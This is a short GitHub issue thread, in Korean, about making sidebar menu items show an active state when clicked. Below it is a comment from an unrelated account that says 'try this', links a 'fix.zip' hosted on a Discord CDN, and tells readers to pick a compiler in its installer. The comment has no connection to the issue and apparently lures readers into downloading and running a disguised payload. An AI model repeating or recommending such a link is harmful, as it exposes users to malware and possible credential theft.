### ISSUE TITLE
[FEAT] 사이드바 메뉴 클릭시 active 적용

### ISSUE THREAD

**Issue by allone9425** [Poten14/Componique#277]
## 💥이슈 설명
- 사이드바 메뉴 클릭시 active 적용
## 📚할 일 목록
- [x] 구현
- [x]  버그 수정
- [x]  스크롤바 스타일링

## ⌛기한
오늘

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
